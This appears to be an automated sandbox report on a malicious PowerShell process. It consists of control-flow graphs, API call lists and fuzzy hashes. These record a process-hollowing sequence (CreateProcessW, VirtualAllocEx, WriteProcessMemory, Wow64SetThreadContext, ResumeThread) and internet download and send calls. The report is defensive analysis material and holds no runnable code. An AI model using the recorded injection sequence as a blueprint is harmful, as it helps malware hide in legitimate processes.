                                                                                                                                                                          execution_graph 8615 267e02 8617 267e0a 8615->8617 8618 267d2f 8617->8618 8620 267dc6 8618->8620 8622 267e46 8618->8622 8619 267e36 8623 267e77 8622->8623 8624 267e8c 8623->8624 8626 267ea7 8623->8626 8647 267e46 8 API calls 8623->8647 8649 267ec0 8623->8649 8624->8619 8630 2683fb 8626->8630 8672 267344 8626->8672 8627 26867d CreateProcessW 8631 2686f1 8627->8631 8628 267fcc 8629 267350 Wow64SetThreadContext 8628->8629 8628->8630 8632 26802a 8629->8632 8630->8627 8633 268411 8630->8633 8632->8630 8634 268119 VirtualAllocEx 8632->8634 8633->8619 8635 268166 8634->8635 8636 268191 VirtualAllocEx 8635->8636 8637 2681e5 8635->8637 8636->8637 8637->8630 8638 267368 WriteProcessMemory 8637->8638 8640 268222 8638->8640 8639 268330 8639->8630 8641 267368 WriteProcessMemory 8639->8641 8640->8630 8640->8639 8646 267368 WriteProcessMemory 8640->8646 8642 268359 8641->8642 8642->8630 8643 267374 Wow64SetThreadContext 8642->8643 8644 2683b7 8643->8644 8644->8630 8645 2683bb ResumeThread 8644->8645 8645->8630 8646->8640 8647->8623 8650 267f39 8649->8650 8651 267344 CreateProcessW 8650->8651 8663 2683fb 8650->8663 8653 267fcc 8651->8653 8652 26867d CreateProcessW 8655 2686f1 8652->8655 8653->8663 8676 267350 8653->8676 8656 268411 8656->8623 8657 26802a 8658 268119 VirtualAllocEx 8657->8658 8657->8663 8659 268166 8658->8659 8660 268191 VirtualAllocEx 8659->8660 8661 2681e5 8659->8661 8660->8661 8661->8663 8680 267368 8661->8680 8663->8652 8663->8656 8664 268330 8664->8663 8665 267368 WriteProcessMemory 8664->8665 8666 268359 8665->8666 8666->8663 8684 267374 8666->8684 8667 268222 8667->8663 8667->8664 8671 267368 WriteProcessMemory 8667->8671 8670 2683bb ResumeThread 8670->8663 8671->8667 8673 268598 CreateProcessW 8672->8673 8675 2686f1 8673->8675 8677 2687d8 Wow64SetThreadContext 8676->8677 8679 268852 
8677->8679 8679->8657 8681 268950 WriteProcessMemory 8680->8681 8683 2689db 8681->8683 8683->8667 8685 2687d8 Wow64SetThreadContext 8684->8685 8687 2683b7 8685->8687 8687->8663 8687->8670

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 267ec0-267f71 4 267f77-267f7c 0->4 5 26857c-268611 0->5 6 267f7e-267f88 4->6 7 267f8a 4->7 10 268613-268616 5->10 11 268619-268620 5->11 9 267f8f-267f91 6->9 7->9 12 267f93-267fa5 9->12 13 267fab-267fce call 267344 9->13 10->11 14 268622-268628 11->14 15 26862b-268641 11->15 12->13 21 267fd4-267fe9 13->21 22 268505-268518 13->22 14->15 17 268643-268649 15->17 18 26864c-2686ef CreateProcessW 15->18 17->18 25 2686f1-2686f7 18->25 26 2686f8-268770 18->26 28 268416 21->28 29 267fef-268013 21->29 36 26851f-268535 22->36 25->26 52 268782-268789 26->52 53 268772-268778 26->53 34 26841b-26842e 28->34 29->36 41 268019-26802c call 267350 29->41 51 268435-268448 34->51 36->5 48 268537-26853f 36->48 49 268032-26803c 41->49 50 2684eb-2684fe 41->50 61 268541-268543 call 2666fc 48->61 62 268548-268555 48->62 49->36 54 268042-26805f 49->54 50->22 75 26844f-268462 51->75 57 2687a0 52->57 58 26878b-26879a 52->58 53->52 54->28 59 268065-26807f call 26735c 54->59 64 2687a1 57->64 58->57 71 268085-26808e 59->71 72 2684d1-2684e4 59->72 61->62 79 268557 62->79 80 26855c-268579 62->80 64->64 73 268090-2680d4 71->73 74 2680ef-2680f5 71->74 72->50 83 2680d6-2680dc 73->83 84 2680dd-2680e9 73->84 74->28 78 2680fb-26810b 74->78 91 268469-26847c 75->91 78->28 89 268111-268164 VirtualAllocEx 78->89 79->80 83->84 84->74 88 2684b7-2684ca 84->88 88->72 94 268166-26816c 89->94 95 26816d-26818f 89->95 110 268483-268496 91->110 94->95 96 268191-2681e3 VirtualAllocEx 95->96 97 2681fc-268203 95->97 101 2681e5-2681eb 96->101 102 2681ec-2681f6 96->102 103 26849d-2684b0 97->103 104 268209-268224 call 267368 97->104 101->102 102->97 103->88 104->110 111 26822a-268233 104->111 110->103 111->28 113 268239-26823f 111->113 113->28 115 268245-268250 113->115 115->28 118 268256-268260 115->118 119 268266-26826b 118->119 120 
268330-268341 118->120 119->28 121 268271-268284 119->121 120->28 124 268347-26835b call 267368 120->124 121->28 125 26828a-268299 121->125 124->75 129 268361-268367 124->129 125->28 130 26829f-2682af 125->130 129->28 131 26836d-26837e 129->131 136 268312-268315 130->136 137 2682b1-2682b4 130->137 134 268380-268383 131->134 135 268389-268391 131->135 134->135 135->28 138 268397-2683a1 135->138 136->28 139 26831b-26831e 136->139 137->28 140 2682ba-2682bd 137->140 138->36 141 2683a7-2683b9 call 267374 138->141 139->28 142 268324-26832a 139->142 140->28 143 2682c3-2682f1 140->143 141->51 147 2683bb-2683f9 ResumeThread 141->147 142->119 142->120 143->28 151 2682f7-268305 call 267368 143->151 149 268402-26840f 147->149 150 2683fb-268401 147->150 149->34 152 268411 149->152 150->149 155 26830a-26830c 151->155 152->79 155->91 155->136
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,?,00000000,00003000,00000040), ref: 0026814D
                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 002681CC
                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 002683E2
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002686DC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocVirtual$CreateProcessResumeThread
                                                                                                                                                                          • String ID: lX
                                                                                                                                                                          • API String ID: 1213262536-2093460002
                                                                                                                                                                          • Opcode ID: 0403cf6fca7eed77ed6ac74f23bae874bfac37bf4d9dd995c77a99da10a3fd89
                                                                                                                                                                          • Instruction ID: ff6b78a28cbd7c889a0de5f6f86650c09698de77d3ca0f6e4c70a178b4863c97
                                                                                                                                                                          • Opcode Fuzzy Hash: 0403cf6fca7eed77ed6ac74f23bae874bfac37bf4d9dd995c77a99da10a3fd89
                                                                                                                                                                          • Instruction Fuzzy Hash: 3432B170A102198FDB24DF64C844BAEBBB2AF84304F1482A9E449BB391DF749E95CF51

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
control_flow_graph: [graph rendering residue; recoverable content only] function starting at 267e46 (basic blocks 267e46 through 2687a1); API calls labelled in the graph: VirtualAllocEx (blocks 268111-268164 and 268191-2681e3), CreateProcessW (block 26864c-2686ef), ResumeThread (block 2683bb-2683f9); internal calls to 267344, 267350, 26735c, 267368 (three call sites), 267374, 2666fc, 267e46, 267ec0.
Strings
Memory Dump Source
• Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_260000_powershell.jbxd
Similarity
• API ID:
• String ID: lX
• API String ID: 0-2093460002
• Opcode ID: 302a407d61136299b3bee1fe3e2d0d154d44657a9019870af4c7fa0860638b86
• Instruction ID: c9a2c86650b33bc9a04c91ae3f8f108016eafd23f2d82d3320437b054c948685
• Opcode Fuzzy Hash: 302a407d61136299b3bee1fe3e2d0d154d44657a9019870af4c7fa0860638b86
• Instruction Fuzzy Hash: EAF18E70A143198FDB24CF24CC84BA9BBB6AF85344F2482A9E54CA7391DF749E94CF51

Control-flow Graph

control_flow_graph: [graph rendering residue; recoverable content only] function starting at 451e38 (basic blocks 451e38 through 452146); no API calls labelled in the graph.
Strings
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID: @==$@==
• API String ID: 0-1433957189
• Opcode ID: b3faa8eba6c7c8a8f7bbfd42b3ae2f161b071a4bff3eab3dd1febb816154ddbb
• Instruction ID: a0fec3da8f9bb8c5df28918e5baa3a2e01a45d4d79ff2a38e7f4319ed32bb168
• Opcode Fuzzy Hash: b3faa8eba6c7c8a8f7bbfd42b3ae2f161b071a4bff3eab3dd1febb816154ddbb
• Instruction Fuzzy Hash: 0F7176327002059FDB245A69844077BB7A2AFC2712F24807BDD45DB3A3DBB9CD4AC766

Control-flow Graph

control_flow_graph: [graph rendering residue; recoverable content only] function starting at 451e19 (basic blocks 451e19 through 452146); no API calls labelled in the graph.
Strings
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID: @==$@==
• API String ID: 0-1433957189
• Opcode ID: 0ec115f5f92f2499cc6111be9c740d96857722a501f68c7eebba74f9f1fc2626
• Instruction ID: 5256f210ee28b017d5221f540199c842ae889c55b9108549e4ed71bf2fb5832b
• Opcode Fuzzy Hash: 0ec115f5f92f2499cc6111be9c740d96857722a501f68c7eebba74f9f1fc2626
• Instruction Fuzzy Hash: 633122326043059FDB218B64C85077BBBB1AF91712F2441ABDC058B2A3D73DCD89CB6A

Control-flow Graph

control_flow_graph: [graph rendering residue; recoverable content only] function starting at 267344 (basic blocks 267344 through 2687a1); API call labelled in the graph: CreateProcessW (block 26864c-2686ef).
APIs
• CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 002686DC
Memory Dump Source
• Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_260000_powershell.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 73cc60b2a5d8bc4ec6a263b01741c4b0d96e511abe5a4fd0df57009951b83571
• Instruction ID: 79568a73854b3a564f5607b8213ba9faff52f3d670ad34a494f6d1ffd0c78315
• Opcode Fuzzy Hash: 73cc60b2a5d8bc4ec6a263b01741c4b0d96e511abe5a4fd0df57009951b83571
• Instruction Fuzzy Hash: 955128B1911219DFEF24CF99C980BDDBBB5BF48304F1085AAE909B7250DB719A98CF50

Control-flow Graph

control_flow_graph: [graph rendering residue; recoverable content only] function starting at 267368 (basic blocks 267368 through 268a03); API call labelled in the graph: WriteProcessMemory (block 2689a0-2689d9).
APIs
• WriteProcessMemory.KERNELBASE(?,00000000,00000000,134C197F,00000000,?,?,?,00000000,00000000,?,00268222,?,00000000,?), ref: 002689CC
Memory Dump Source
• Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_260000_powershell.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 78bded305f3d694c349ecdf536949f55083675d36608b830719a3dd5138c53a9
• Instruction ID: e28186fa70cc63d5f0f2f42becf0e4a32139cc3656225f183ef3d7ca51ee8311
• Opcode Fuzzy Hash: 78bded305f3d694c349ecdf536949f55083675d36608b830719a3dd5138c53a9
• Instruction Fuzzy Hash: 9A21E7B1911209DFDB10CF99C884BEEBBF4FB48314F508529E958A7340D379A954CBA5

Control-flow Graph

control_flow_graph: [graph rendering residue; recoverable content only] function starting at 268949 (basic blocks 268949 through 268a03); API call labelled in the graph: WriteProcessMemory (block 2689a0-2689d9).
APIs
• WriteProcessMemory.KERNELBASE(?,00000000,00000000,134C197F,00000000,?,?,?,00000000,00000000,?,00268222,?,00000000,?), ref: 002689CC
Memory Dump Source
• Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_260000_powershell.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 2a8043ffa4396bdd5fb76ec64efdd09096f411351c24f188c281b508038b06de
• Instruction ID: 9197ad39e1d9cffdd103de81b539ef1f53eb1eff7d008f706e1ca8c665632d89
• Opcode Fuzzy Hash: 2a8043ffa4396bdd5fb76ec64efdd09096f411351c24f188c281b508038b06de
• Instruction Fuzzy Hash: 5C2134B6911209DFDB10CFA9C984BDEBBF4FF48310F50842AE458A3300D378AA44CBA1

Control-flow Graph

control_flow_graph: [graph rendering residue; recoverable content only] function starting at 267374 (basic blocks 267374 through 26887a); API call labelled in the graph: Wow64SetThreadContext (block 268824-268850).
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0026802A), ref: 00268843
Memory Dump Source
• Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_260000_powershell.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 6b75e6291e33b7f7b6e9d711d7e434d761698fcbcf3868def1d6ff5d0d9bc3c1
• Instruction ID: e1f658d7725bda5900d5b851edc484905671980b700ef62374ba833dbb5e872d
• Opcode Fuzzy Hash: 6b75e6291e33b7f7b6e9d711d7e434d761698fcbcf3868def1d6ff5d0d9bc3c1
• Instruction Fuzzy Hash: 7F1137B1D102498FDB60CF9AC884BDEFBF5EB88310F558529D458B3640D778A945CFA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 515 267350-268818 517 268824-268850 Wow64SetThreadContext 515->517 518 26881a-268822 515->518 519 268852-268858 517->519 520 268859-26887a 517->520 518->517 519->520
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0026802A), ref: 00268843
Memory Dump Source
• Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_260000_powershell.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 9df5fb288bc54b5e3ff54e3607b1cfce04b48e92eb862caaf85d6e9af643371b
• Instruction ID: 0bd6e16ea228a3209ae3ed02678c7cc21fed18327433438a4b6d1a046318879c
• Opcode Fuzzy Hash: 9df5fb288bc54b5e3ff54e3607b1cfce04b48e92eb862caaf85d6e9af643371b
• Instruction Fuzzy Hash: B51126B1D102498FDB50CF9AC884BDEFBF5EB88310F258529D458A3640D778A944CFA1
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d319e25419aa6ab2d165bbf782353f4054060154e62eff3a7b69a3a0afd2462b
• Instruction ID: 7e64bbd3be785fcf59bc635acd64c1690fc6451838ec5906fa3f38aaea037213
• Opcode Fuzzy Hash: d319e25419aa6ab2d165bbf782353f4054060154e62eff3a7b69a3a0afd2462b
• Instruction Fuzzy Hash: 05123531B04204DFDB159F64C4507ABBBA2AF86353F14C0ABE8158B352DB79CE4ACB56

Control-flow Graph (graph image not reproduced; raw basic-block edge list omitted)
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2354b77fad987ca48b39c995bc78578defeedb301a6d320739dd03f0fb477ca8
• Instruction ID: 0c9dc1bdf6e3231e94e6c368d3c9713126a15921f2a742af1becd258fce179ba
• Opcode Fuzzy Hash: 2354b77fad987ca48b39c995bc78578defeedb301a6d320739dd03f0fb477ca8
• Instruction Fuzzy Hash: F2B125317002459FCB258B358A1066BBBA1AFD7312F2480BBDC549B353DBB9CD4AC766

Control-flow Graph (graph image not reproduced; raw basic-block edge list omitted)
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ce3a7d55a4c54a2ca4c0804b6b1c5e9d70f7996aad5b12138dfb5d3046a326f5
• Instruction ID: 1802b21762b18538cf06f2bb93ce3e43a21850ab6de030df5af817b862fe58b9
• Opcode Fuzzy Hash: ce3a7d55a4c54a2ca4c0804b6b1c5e9d70f7996aad5b12138dfb5d3046a326f5
• Instruction Fuzzy Hash: FC517334B00208CFDB14DF94C280AAAB7F2EF89711F14856AD8056B356C7759D82DB61

Control-flow Graph (graph image not reproduced; raw basic-block edge list omitted)
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 44ee32bf72a264786dd91ce525e69028c1e12e68d2571bfa43e2359e53e22de3
• Instruction ID: b4467c8efff1e58dc883c54ee27af72e9f28cc13d2912b25fa8f391649047287
• Opcode Fuzzy Hash: 44ee32bf72a264786dd91ce525e69028c1e12e68d2571bfa43e2359e53e22de3
• Instruction Fuzzy Hash: BA51A434A00204CFD710CF54C240BAAB7F2EF8A711F1486ABD805AB362C775EC86DB61
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 570ee4c122fce59517575513f146e0764a6866f9bf8643951e26c9ccff44fd5b
• Instruction ID: ef18457cdd9e2254b868259c259d0ad8e1e603869a442db46100a02391e8df8f
• Opcode Fuzzy Hash: 570ee4c122fce59517575513f146e0764a6866f9bf8643951e26c9ccff44fd5b
• Instruction Fuzzy Hash: B641D635609381CFC7228B10C85166ABFB1AF86701F1984DBE8549F293C775DD49C7A6
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 034b0f8121dc6459fcfb5c7dfb29187e1958b199a4903cd3448755058a30965c
• Instruction ID: 3f6d8e8208817e0d2e736508130cd6e82cf59461f4bdb551ea5ee536cfc16c34
• Opcode Fuzzy Hash: 034b0f8121dc6459fcfb5c7dfb29187e1958b199a4903cd3448755058a30965c
• Instruction Fuzzy Hash: 0A318C30A00208DFDB25CF55C844B6ABBA1BB41393F14806BED048B292C778DE99CB5A
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ab82b28d70a967d61a85cb3c8253a531ac2717922364a9fce2eafe28182dacde
• Instruction ID: 4cf5c04a38d19d79d013be4ad0823823c164530b41b84c38a64104515727239e
• Opcode Fuzzy Hash: ab82b28d70a967d61a85cb3c8253a531ac2717922364a9fce2eafe28182dacde
• Instruction Fuzzy Hash: AB219030A00305CFCB24DE29C59076BB7E1AB55793F14C067E8048739AD778DE8ACB56
Memory Dump Source
• Source File: 00000013.00000002.514671783.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1ad000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6a6975ddfa752165c7e9b02a33e772e055e7a37bb8099289364089120a02a88
• Instruction ID: a9ab074a950fb53a62bb499f02027ac9ddab73f185b6eb5e6af2719596d30be2
• Opcode Fuzzy Hash: d6a6975ddfa752165c7e9b02a33e772e055e7a37bb8099289364089120a02a88
• Instruction Fuzzy Hash: E2019E6100D3C09FD7134B259D98762BFB8EF53624F1984CBE8898F1A3C2695C45CB72
Memory Dump Source
• Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_450000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bd8dd54a52014fbaa79a56b1ce558f3118595a32da25c44038d759c1dccefc7e
• Instruction ID: cd79f7c4e53849b676a98a00a324bbb099dbb8edc09e031bb585d705c642a753
• Opcode Fuzzy Hash: bd8dd54a52014fbaa79a56b1ce558f3118595a32da25c44038d759c1dccefc7e
• Instruction Fuzzy Hash: 8C01974950E3C85FD7434BB058245A97F319E93600B0A82EBD4C58F2E3D6288A0DCB27
Memory Dump Source
• Source File: 00000013.00000002.514671783.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_1ad000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: af131c95d528d63986e80ea2491b5fd4754ab5b3cd7337f356b5349ea6578dac
• Instruction ID: dac784ca5d41bd14844efd63be54335a98a5c03cfaaec0177f79d784b65ee221
• Opcode Fuzzy Hash: af131c95d528d63986e80ea2491b5fd4754ab5b3cd7337f356b5349ea6578dac
                                                                                                                                                                          • Instruction Fuzzy Hash: F501F775104B40AAE7115F25D9C4767FBD8DF82764F18C019FC4A0B582C3799941CAB1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514719803.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_260000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3690ae49c7f4fcf7e0fbc9e717bddd5d231b9b98409011d6a473e708094b72b2
                                                                                                                                                                          • Instruction ID: 2030ecc9a7d835f00df6ebde09e8ee07d757b9a99d5ce37f6c4e8e481a10acbd
                                                                                                                                                                          • Opcode Fuzzy Hash: 3690ae49c7f4fcf7e0fbc9e717bddd5d231b9b98409011d6a473e708094b72b2
                                                                                                                                                                          • Instruction Fuzzy Hash: DBF1759692F7C25FE303673948B51DA3FB1AE6329075E10E7C491CF1A3D609486EC3A6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.514832946.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_450000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (Fa$D<=$D<=$D<=$L4#p$L4#p$L4#p$h<=
                                                                                                                                                                          • API String ID: 0-102881801
                                                                                                                                                                          • Opcode ID: 6e7cfdefabb23fd3101677ffa8480742040ee48b73d35b88cb7db4dc411777bb
                                                                                                                                                                          • Instruction ID: 76a1ae27b82d9fc60468c518a691782bb6506f2f56edc662a3137e673a684557
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e7cfdefabb23fd3101677ffa8480742040ee48b73d35b88cb7db4dc411777bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 78613531700258AFDF169B64C8507BE7BA2AF81301F148067ED059B3A3DB79DE49C7A6

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:5.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:20.1%
                                                                                                                                                                          Signature Coverage:3.4%
                                                                                                                                                                          Total number of Nodes:1514
                                                                                                                                                                          Total number of Limit Nodes:32
                                                                                                                                                                          execution_graph 53043 415d41 53058 41b411 53043->53058 53045 415d4a 53069 4020f6 53045->53069 53050 4170c4 53093 401e8d 53050->53093 53054 401fd8 11 API calls 53055 4170d9 53054->53055 53056 401fd8 11 API calls 53055->53056 53057 4170e5 53056->53057 53099 4020df 53058->53099 53063 41b456 InternetReadFile 53067 41b479 53063->53067 53064 41b4a6 InternetCloseHandle InternetCloseHandle 53066 41b4b8 53064->53066 53066->53045 53067->53063 53067->53064 53068 401fd8 11 API calls 53067->53068 53110 4020b7 53067->53110 53068->53067 53070 40210c 53069->53070 53071 4023ce 11 API calls 53070->53071 53072 402126 53071->53072 53073 402569 28 API calls 53072->53073 53074 402134 53073->53074 53075 404aa1 53074->53075 53076 404ab4 53075->53076 53177 40520c 53076->53177 53078 404ac9 ctype 53079 404b40 WaitForSingleObject 53078->53079 53080 404b20 53078->53080 53082 404b56 53079->53082 53081 404b32 send 53080->53081 53083 404b7b 53081->53083 53183 4210cb 54 API calls 53082->53183 53085 401fd8 11 API calls 53083->53085 53087 404b83 53085->53087 53086 404b69 SetEvent 53086->53083 53088 401fd8 11 API calls 53087->53088 53089 404b8b 53088->53089 53089->53050 53090 401fd8 53089->53090 53091 4023ce 11 API calls 53090->53091 53092 401fe1 53091->53092 53092->53050 53094 402163 53093->53094 53095 40219f 53094->53095 53201 402730 11 API calls 53094->53201 53095->53054 53097 402184 53202 402712 11 API calls std::_Deallocate 53097->53202 53100 4020e7 53099->53100 53116 4023ce 53100->53116 53102 4020f2 53103 43bda0 53102->53103 53108 4461b8 __Getctype 53103->53108 53104 4461f6 53132 44062d 20 API calls __dosmaperr 53104->53132 53105 4461e1 RtlAllocateHeap 53107 41b42f InternetOpenW InternetOpenUrlW 53105->53107 53105->53108 53107->53063 53108->53104 53108->53105 53131 443001 7 API calls 2 library calls 53108->53131 53111 4020bf 
53110->53111 53112 4023ce 11 API calls 53111->53112 53113 4020ca 53112->53113 53133 40250a 53113->53133 53115 4020d9 53115->53067 53117 402428 53116->53117 53118 4023d8 53116->53118 53117->53102 53118->53117 53120 4027a7 53118->53120 53121 402e21 53120->53121 53124 4016b4 53121->53124 53123 402e30 53123->53117 53125 4016cb 53124->53125 53126 4016c6 53124->53126 53125->53126 53127 4016f3 53125->53127 53130 43bd68 11 API calls _Atexit 53126->53130 53127->53123 53129 43bd67 53130->53129 53131->53108 53132->53107 53134 40251a 53133->53134 53135 402520 53134->53135 53136 402535 53134->53136 53140 402569 53135->53140 53150 4028e8 53136->53150 53139 402533 53139->53115 53161 402888 53140->53161 53142 40257d 53143 402592 53142->53143 53144 4025a7 53142->53144 53166 402a34 22 API calls 53143->53166 53146 4028e8 28 API calls 53144->53146 53149 4025a5 53146->53149 53147 40259b 53167 4029da 22 API calls 53147->53167 53149->53139 53151 4028f1 53150->53151 53152 402953 53151->53152 53153 4028fb 53151->53153 53175 4028a4 22 API calls 53152->53175 53156 402904 53153->53156 53158 402917 53153->53158 53169 402cae 53156->53169 53157 402915 53157->53139 53158->53157 53160 4023ce 11 API calls 53158->53160 53160->53157 53162 402890 53161->53162 53163 402898 53162->53163 53168 402ca3 22 API calls 53162->53168 53163->53142 53166->53147 53167->53149 53170 402cb8 __EH_prolog 53169->53170 53176 402e54 22 API calls 53170->53176 53172 4023ce 11 API calls 53174 402d92 53172->53174 53173 402d24 53173->53172 53174->53157 53176->53173 53178 405214 53177->53178 53179 4023ce 11 API calls 53178->53179 53180 40521f 53179->53180 53184 405234 53180->53184 53182 40522e 53182->53078 53183->53086 53185 405240 53184->53185 53186 40526e 53184->53186 53187 4028e8 28 API calls 53185->53187 53200 4028a4 22 API calls 53186->53200 53190 40524a 53187->53190 53190->53182 53201->53097 53202->53095 53203 10006d60 53204 10006d69 53203->53204 53205 10006d72 53203->53205 53207 10006c5f 53204->53207 53227 10005af6 
